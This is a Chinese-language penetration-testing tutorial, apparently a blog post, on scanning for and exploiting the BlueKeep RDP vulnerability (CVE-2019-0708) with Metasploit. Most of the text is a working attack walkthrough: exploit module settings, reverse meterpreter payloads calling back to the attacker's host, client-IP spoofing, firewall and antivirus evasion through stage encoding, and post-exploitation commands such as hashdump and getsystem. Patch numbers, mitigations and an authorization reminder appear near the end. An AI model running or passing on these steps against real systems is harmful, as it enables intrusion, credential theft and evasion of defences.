实战指南：利用Metasploit框架检测与利用BlueKeep漏洞（CVE-2019-0708）

1. BlueKeep漏洞背景与危害

BlueKeep（CVE-2019-0708）是Windows远程桌面服务（RDP）中存在的一个严重远程代码执行漏洞。这个漏洞的特殊之处在于它属于"蠕虫级"漏洞，意味着不需要用户交互就能在系统间传播。2019年曝光时，全球约有100万台Windows设备暴露在风险中。

我曾在企业内网渗透测试中遇到过未修复的BlueKeep漏洞。当时一台Windows Server 2008 R2系统就因为未打补丁，被我们成功利用获取了系统权限。攻击者利用这个漏洞可以完全控制目标系统，执行任意代码，安装恶意软件，甚至创建具有完全用户权限的新账户。

受影响的Windows版本包括：

• Windows 7
• Windows Server 2008 R2
• Windows Server 2008
• Windows XP（是的，仍有大量老旧系统在使用）

特别提醒：即使关闭了RDP服务的3389端口，只要系统存在漏洞就仍有风险。因为攻击者可以先通过其他方式进入内网，再横向移动利用此漏洞。

2. 环境准备与工具配置

2.1 基础环境搭建

建议使用Kali Linux作为测试平台，它预装了Metasploit框架。如果使用其他Linux发行版，需要手动安装：

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall chmod 755 msfinstall ./msfinstall

实测中发现，Metasploit版本不同可能导致模块可用性差异。推荐使用6.0以上版本，可以通过msfconsole -v查看当前版本。

2.2 目标环境配置

为了安全测试，建议在虚拟环境中搭建靶机：

1. 下载Windows 7 SP1镜像（官方评估版仍可获取）
2. 在VMware/VirtualBox中创建虚拟机
3. 务必关闭防火墙（否则可能影响测试结果）
4. 启用远程桌面服务（默认禁用）

快速检查RDP服务是否开启：

Get-NetTCPConnection -LocalPort 3389

3. 漏洞检测实战步骤

3.1 使用Metasploit扫描漏洞

启动msfconsole后，我习惯先更新数据库：

msfdb init msfconsole -q

搜索BlueKeep相关模块：

search cve-2019-0708

你会看到两个关键模块：

• 扫描模块（auxiliary/scanner/rdp/cve_2019_0708_bluekeep）
• 利用模块（exploit/windows/rdp/cve_2019_0708_bluekeep_rce）

先使用扫描模块检测漏洞：

use auxiliary/scanner/rdp/cve_2019_0708_bluekeep set RHOSTS 192.168.1.100 # 替换为目标IP set THREADS 10 # 多线程加速扫描 run

如果看到[+] 192.168.1.100:3389 - The target is vulnerable.，恭喜你找到了一个易受攻击的系统。

3.2 常见扫描问题解决

问题1：扫描结果显示"Not vulnerable"但实际存在漏洞

• 可能原因：目标系统打了补丁但未重启
• 解决方案：强制目标系统重启后重试

问题2：连接超时

• 检查网络连通性：ping 192.168.1.100
• 确认RDP端口开放：nc -zv 192.168.1.100 3389

4. 漏洞利用详细过程

4.1 基础利用配置

选择利用模块并配置参数：

use exploit/windows/rdp/cve_2019_0708_bluekeep_rce set RHOSTS 192.168.1.100 set LHOST 192.168.1.50 # 你的Kali IP set payload windows/x64/meterpreter/reverse_tcp

关键参数说明：

• target：自动检测即可，手动设置可能适得其反
• EnableContextEncoding：绕过部分防护机制
• RDP_CLIENT_IP：可设置为任意伪造IP

4.2 高级利用技巧

技巧1：提高利用成功率

set EnableContextEncoding true set RDP_CLIENT_IP 192.168.1.200 # 伪造客户端IP

技巧2：绕过网络限制

set ReverseAllowProxy true set ReverseListenerBindPort 443 # 使用HTTPS端口

执行攻击：

exploit -j # 后台运行

成功后会返回meterpreter会话，可以执行：

sessions -l # 查看会话 sessions -i 1 # 进入会话

5. 后渗透与防御措施

5.1 获取系统权限后的操作

在meterpreter会话中，我常用的几个命令：

getuid # 查看当前权限 sysinfo # 获取系统信息 hashdump # 提取密码哈希 screenshot # 截取当前屏幕

如果遇到权限不足，尝试提权：

getsystem

5.2 漏洞修复方案

微软官方补丁下载：

• Windows 7/Server 2008 R2: KB4499175
• Windows Server 2008: KB4499180

临时缓解措施（如果无法立即打补丁）：

1. 禁用远程桌面服务

   Stop-Service TermService -Force Set-Service TermService -StartupType Disabled

2. 启用网络级认证(NLA)

   Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" -Name "UserAuthentication" -Value 1

6. 实战经验与避坑指南

在实际渗透测试中，我遇到过几个典型问题：

坑1：虚拟机环境利用成功率低

• 原因：VMware虚拟显卡驱动干扰
• 解决：改用VirtualBox或物理机测试

坑2：meterpreter会话不稳定

• 优化：使用更稳定的payload

  set payload windows/x64/meterpreter/reverse_https

坑3：杀毒软件拦截

• 绕过：使用自定义payload编码

  set EnableStageEncoding true set StageEncoder x64/zutto_dekiru

对于防御方，建议：

1. 定期扫描内网3389端口开放情况
2. 对必须使用RDP的系统，配置IP白名单
3. 部署入侵检测规则，监控BlueKeep利用特征

最后提醒：所有渗透测试必须获得书面授权，未经授权的测试可能涉及法律风险。我在一次企业测试中，就因为忘记续签授权书差点惹上麻烦。